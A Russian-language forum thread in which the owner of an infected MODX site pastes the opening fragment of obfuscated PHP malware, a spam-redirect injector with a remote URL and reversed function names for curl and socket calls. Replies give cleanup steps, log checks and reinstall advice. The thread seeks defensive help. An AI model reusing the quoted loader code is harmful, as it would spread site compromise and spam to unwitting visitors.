Сайт поймал не понятный вирус....

Здравствуйте!

Наш сайт, как обнаружилось поймал не понятный вирус…
Если кто знает как его нейтрализовать, большая просьба помочь.

В index.php
<?php @'$
yumingid=19
lineid=702
x3=
x4=yWUPqAkfGJ
x5=Bank,beautyparlor,Muntjac,mine,Hammock,army,inch,Ring,select,strict,jewelry,LineIsBusy,lady,Friday,mainly,toflyakite,least,income,HulaHoop,active,incentive,bedroom,companybus,whatever,cooking,kneecap,concentrate,begin,back,programdirector
x6=
x7=http://btuan05.ytuuwtizhy583ywfij/weilai.php
cache=1
pgmb=0
urlgz=@/#/!/|@/#/$/|@/#/!.*|@/^/!|@/^/$/|#/!/|#/$/|#/!/@/|#/$/@/|#/!/@.*|#/$/@.*|#/$/@/|#/!/@/@|#/$/@/@/|#/!/@.*|#/$/*/@/|@/#/!|@/#/:/!/|@/#/:.*=$|@.*/#/!|#/@+:.*=$|@/#/!/@/+@|@/#-@/!/|@/#/$/@/|@/#/!-@.*|@/#+@/$/|@/^_@/!|@/^-@/$/|@/^/$/@|#/!-@+@/|#/$_@+@/|#/!_@/@/|#/$/+@@/|#/!/@+@.*|#/$/@@.*|@/#_@/!|@/#_:_@/$/|@/#_@/$/|@/^/@/$/|#/!-@/|#_@/$_@/|#/!/@+@/|#/$-@/@/|#/!_@/@.*|#/$/@_@.*|*/#/!/@/||htm,html,php,jsp,pdf,shtml,cgi
';$O0O0O000O00=explode(«1l»,«peelsu1ltimil_emit_tes1ledolpmi1lfoef1lyarra_ni1lridkm1lezilairesnu1ltressa1ltilps_gerp1ltilps_rts1ldnuor1lesrever_yarra1lftnirps1ltfihs_yarra1l5dm1ltes_ini1ltrats_bo1lrid_si1lsba1lmirt1latad_atem_teg_maerts1lecils_yarra1lnioj1lhctam_gerp1lliec1lcexe_lruc1legrem_yarra1llru_esrap1ledolpxe1lstegf1ldro1lelffuhs1ltnuoc1ledocnelru1l31tor_rts1lrtsbus1lyreuq_dliub_ptth1ldnar_tm1lemanybtsohteg1letirw_tekcos1lstsixe_noitcnuf1letad1ldaer_tekcos1lecalperi_rts1lseulav_yarra1lhcraes_yarra1lesolcf1lpilf_yarra1lofniphp1lelbatirw_si1leuqinu_yarra1lcedxeh1ldomhc1lelif_si1lgnikcolb_tes_maerts1llla_hctam_gerp1lecalper_rts1lesolc_lruc1letirwf1lyarra_si1legnar1lnoitcnuf_etaerc1ltuoemit_tes_maerts1ltes_enozemit_tluafed_etad1lecalper_gerp1ledoced_ytitne_lmth1ltroba_resu_erongi1ldaerf1lrhc1lesolc_tekcos1ltcartxe1lciremun_si1lstnetnoc_teg_elif1lpop_yarra1lnelrts1llavtni1ltcennoc_tekcos1lroolf1ledocedlru1lsoprts1ltpotes_lruc1lstnetnoc_tup_elif1ltneilc_tekcos_maerts1ltini_lruc1lkcabllac_ecalper_gerp1lsoprrts1lbolg1lredaeh»);foreach($O0O0O000O00 as&$OO0O00000)

Это только начало кода… Откуда могло взяться и как не понятно… Проверили айболитом, он это не обнаружил как вирус… Может кто нибудь объяснить, что дальше делать.

20 комментариев

avatar
нейтрализовать заменой файла из дистрибутива, а через что проник нужно искать…
давно обновлялись?
avatar
Нейтрализовать заменой не получиться… Последняя дата резерва на хостинге в январе 2017, а он появился в конце того года… Главное удалить код не получается, сайт перестает показываться… Такой код сейчас обнаруживаю находится в файлах 30… В каком плане обновлялся?
avatar
Может у меня руки кривые, что не могу PHP нормально отредактировать… Больше с html работал…
avatar
из дистрибутива — это значит из чистой установки, я не писал про бекап хостинга
avatar
Приношу извинения за глупый вопрос что такое проник? С modx неделю знаком. Дистрибутива нет
Комментарий отредактирован 2017-04-20 12:14:06 пользователем tohastar
avatar
Находя левые скрипты и удаляя их. Они появляются снова… Обновление не делал ещё 0,9.8
avatar
проник – глагол, действ. зал., прош. вр., муж. р., ед. ч.)))
если настолько старая версия то тут надо даже не лечить, а делать новый сайт и со старого переносить информацию
avatar
А обновить не получится чтоль? Или Вы думаете так будет проще?
avatar
Во-первых, айболитом надо искать исключительно в максимальном режиме, как он там называется, паранойи кажется. В стандартном бессмысленно. Да и айболит, это только один из шагов, не более.
Во-вторых, если сайт заражен продолжительное время, то там уже не один вирус и не один посторонний файл, а сотни. К тому же, он может прописаться и в ядре и в базе.
Т.е. лечить все это самостоятельно у вас не получится, либо ищите исполнителя, либо обратитесь к авторам айболита, они на этом специализируются.
avatar
Я согласен, что он не один… Нахожу уже около 50 сторонних файлов. Они дают перепосты на китайские английские ссылки. Причём ещё спам письма приходят одного смысла… На почту поддоменом.
avatar
Немного не понятно действия. Изменяя все пароли, Кто все равно может проникнуть через скрипты...?
avatar
Кому попадался такой код? В сети вышел на него на 1 иностранный сайт… А так его нет.
avatar
Пока вы ищите код вируса, вам ежесекундно записывают на сервер новые. Я когда поймал свой первый вирус также действовал, расшифровывал его зачем-то.
Теперь я на это время не трачу. Сайт в офлайн. Дамп. Сначала проверка базы на наличие гадов. Далее сканирование айболитом в параноидальном режиме. Затем логи. В Логах ищу все запросы на php файлы. Папка ядра удаляется полностью, закачивается новая, чистая, но той же версии. Аналогично со всеми стандартными сниппетами/плагинами/модулямии. Визуально проверяю все файлы в корне сайта, лишнее удаляю, стандартное перезаливаю.
Потом обновление до последней версии.
Это вкратце. В зависимости от проекта могут быть дополнительные телодвижения. А расшифровывать вирусы… Не, времени жалко. Я за это время уже бы сайт вылечил. Если рука набита — то пара тройка часов на стандартный сайт. В прошлом году когда повально взламывались я их десятками чистил. Но это было на Evo.
avatar
Забыл сказать, все сайты на аккаунте проверять аналогичным образом. Скорее всего заражены все.
avatar
В этом и дело, что Вы сталкивались с ними поэтому и специалист, а для меня они как баран новые ворота… Пытаюсь разобраться как попадают и для чего они…
avatar
Вы я так понимаю на коммерческой основе занимаетесь?
avatar
Простите за сарказм, но так и хочется написать: «Нет, он просто ходит по интернету и у всех спрашивает — ребята, а можно я вам бесплатно сайт сделаю или вылечу, а? ну пожалуйста?» :D
avatar
И, кстати, он вам написал:
Т.е. лечить все это самостоятельно у вас не получится, либо ищите исполнителя, либо обратитесь к авторам айболита, они на этом специализируются.
avatar
Писал уже несколько раз

Cкачиваете все оформление и пользовательские прикрепленные файлы (/assets/files,images, галереи если есть), проходитесь на своей машине по этим папкам поиском и бахаете все файлы расширения PHP и другие нетипичные для папок.

Затем стираете сайт целиком, кроме файла /manager/includes/config.inc.php (или берете из дистрибутива и вписываете свою базу, если есть подозрения на заражение и его). Доступы к базе тоже надо бы сменить. Для полной параноидальности через phpMyAdmin можно очистить таблицы plugins, plugin_events и snippets. Естественно, не забываем бэкап базы до манипуляций.

Закачиваете дистрибутив, выбираете обновление — текущая база подсосется из конфига.

Потом возвращаете оформление и загруженные вложения, картинки, стили и тд.
И еще evoCheck на предмет закладок в базе, ели не затирали таблицы сниппетов и плагинов

PS После n*10 сайтов вас уже не очень будет интересовать, что там за вирусы и как они туда попали. Если юзаете FileZilla — это может из вариантов приплызда, с таким тоже сталкивались, но чаще всего, дыры в старой верси иmodx
avatar
Если у вас в access.log есть POST запрос на php файл с ответом сервера 200, ну типа такого:
POST /assets/templates/javascript.php HTTP/1.0" 200

Начинайте хвататься за сердце и бить во все колокола. Это наверняка будет либо вирус, либо измененный файл, содержащий вирус.
Только зарегистрированные и авторизованные пользователи могут оставлять комментарии.